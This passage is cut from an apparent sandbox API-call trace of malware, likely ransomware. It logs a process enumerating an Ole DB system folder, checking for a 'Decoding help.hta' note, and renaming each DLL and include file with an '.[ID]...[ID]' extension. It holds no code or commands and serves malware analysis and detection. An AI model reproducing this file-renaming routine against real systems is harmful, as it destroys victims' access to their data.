lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasqlr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasqlr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.475] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeaee044, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xaeaee044, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bdee0a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdatl3.dll", cAlternateFileName="")) returned 1 [0044.475] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.475] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.475] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.475] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdatl3.dll") returned -1 [0044.475] lstrlenW (lpString="msdatl3.dll") returned 11 [0044.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.475] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdatl3.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll" [0044.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll" [0044.475] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatl3.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatl3.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.476] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ee79a4, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb4ee79a4, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bdee0a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdatt.dll", cAlternateFileName="")) returned 1 [0044.476] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.476] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdatt.dll") returned -1 [0044.476] lstrlenW (lpString="msdatt.dll") returned 10 [0044.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdatt.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll" [0044.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll" [0044.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatt.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.476] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad9d2297, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xad9d2297, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bdee0a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaurl.dll", cAlternateFileName="")) returned 1 [0044.476] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.476] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.477] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaurl.dll") returned -1 [0044.477] lstrlenW (lpString="msdaurl.dll") returned 11 [0044.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.477] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.477] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msdaurl.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll" [0044.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll" [0044.477] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaurl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaurl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.478] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2b0cf35, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb2b0cf35, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xa0f9caf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msxactps.dll", cAlternateFileName="")) returned 1 [0044.478] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.478] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.478] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.478] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msxactps.dll") returned -1 [0044.478] lstrlenW (lpString="msxactps.dll") returned 12 [0044.478] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.478] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.478] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="msxactps.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll" [0044.478] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll" [0044.478] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msxactps.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msxactps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.478] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6fc914, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b6fc914, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b722a74, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledb32.dll", cAlternateFileName="")) returned 1 [0044.478] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.479] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.479] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledb32.dll") returned -1 [0044.479] lstrlenW (lpString="oledb32.dll") returned 11 [0044.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.479] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="oledb32.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" [0044.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" [0044.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.479] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb02d8f, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xadb02d8f, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb51db240, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledb32r.dll", cAlternateFileName="")) returned 1 [0044.479] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.479] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.479] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledb32r.dll") returned -1 [0044.479] lstrlenW (lpString="oledb32r.dll") returned 12 [0044.479] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.480] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="oledb32r.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" [0044.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" [0044.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.480] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28bddc5, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x28bddc5, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0x26a8a93, ftLastWriteTime.dwHighDateTime=0x1ca040b, nFileSizeHigh=0x0, nFileSizeLow=0x264c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledbjvs.inc", cAlternateFileName="")) returned 1 [0044.480] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.480] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.480] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledbjvs.inc") returned -1 [0044.480] lstrlenW (lpString="oledbjvs.inc") returned 12 [0044.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.480] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="oledbjvs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc" [0044.480] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc" [0044.480] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0044.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbjvs.inc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbjvs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.481] FindNextFileW (in: hFindFile=0x5e3030, lpFindFileData=0x1cd1fd30 | out: lpFindFileData=0x1cd1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e3f24, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x28e3f24, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0x27ff6ea, ftLastWriteTime.dwHighDateTime=0x1ca040b, nFileSizeHigh=0x0, nFileSizeLow=0x26f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledbvbs.inc", cAlternateFileName="")) returned 1 [0044.481] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*" [0044.481] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*.*") returned 57 [0044.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole 